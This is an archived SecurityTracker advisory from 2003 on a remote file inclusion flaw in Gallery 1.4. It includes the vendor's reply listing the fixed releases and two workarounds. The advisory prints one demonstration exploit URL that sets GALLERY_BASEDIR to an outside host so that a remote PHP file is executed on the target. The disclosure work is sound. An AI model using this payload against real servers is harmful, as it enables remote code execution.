SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Gallery Vendors:   Gallery Project
(Vendor Issues Fix) Re: Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution
SecurityTracker Alert ID:  1007996
SecurityTracker URL:  http://securitytracker.com/id/1007996
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 24 2003
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.4
Description:   An include file vulnerability was reported in Gallery. A remote user can execute arbitrary PHP code on the target system.

It is reported that a remtoe user can specify a remote location for the GALLERY_BASEDIR variable to cause a PHP file at the remote location to be included and executed on the target system.

A demonstration exploit URL is provided:

http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/

The above URL will include and execute the contents of the "http://tester/util.php" file.

[Editor's note: The same flaw, or at least a similar flaw, was reported in July 2002 in Alert ID 1004918 and reportedly fixed in Gallery 1.3.1]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:   The vendor has issued a fixed version (1.4-pl2), available at:

http://sf.net/project/showfiles.php?group_id=7130&release_id=184028

Version 1.4.1 (unreleased; build 145) also contains the fix.

For users that do not want to upgrade, the vendor indicates that you can do one of the following steps [quoted]:

1. Delete gallery/setup/index.php. This will also disable the configuration wizard for you until you restore this file or upgrade to a secure release.

2. Open gallery/setup/index.php in a text editor and change the following lines:

if (!isset($GALLERY_BASEDIR)) {
$GALLERY_BASEDIR = '../';
}

to this:

$GALLERY_BASEDIR = '../';

Vendor URL:  gallery.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Oct 11 2003 Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution



 Source Message Contents

Subject:  Re: Gallery 1.4 including file vulnerability


...
> -Proof of concept-
> It is possible to include any php file from a remote host, and execute
> it on the target's server.

Thanks for the alert.  It's disappointing that you made absolutely
no effort to contact us before announcing this vulnerability.
Even 12 hours would have let us have a release ready in time for
your announcement and you still would have gotten the credit.

This vulnerability affects a small percentage of Unix gallery users,
as it can only be exploited when Gallery is in the non-functional
"configuration mode".  However, it does expose Windows users to
the exploit.  Only the following versions of Gallery have the bug:
* 1.4
* 1.4-pl1
* 1.4.1 (unreleased; prior to build 145)

The problem has been fixed in:
* 1.4-pl2
  http://sf.net/project/showfiles.php?group_id=7130&release_id=184028
* 1.4.1 (unreleased; build 145)

We strongly recommend that you upgrade to 1.4-pl2 immediately.
However, if you don't want to install the entire 1.4-pl2 update, there
are two simple approches you can take to secure your system:

1.  Delete gallery/setup/index.php
    This will also disable the configuration wizard for you until you
    restore this file or upgrade to a secure release.

     --or--

2.  Open gallery/setup/index.php in a text editor and change the
    following lines:

        if (!isset($GALLERY_BASEDIR)) {
          $GALLERY_BASEDIR = '../';
        }

    to this:

       $GALLERY_BASEDIR = '../';

    Note that all we are doing is deleting two lines of code.

regards,
Bharat Mediratta
Gallery Development Team

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC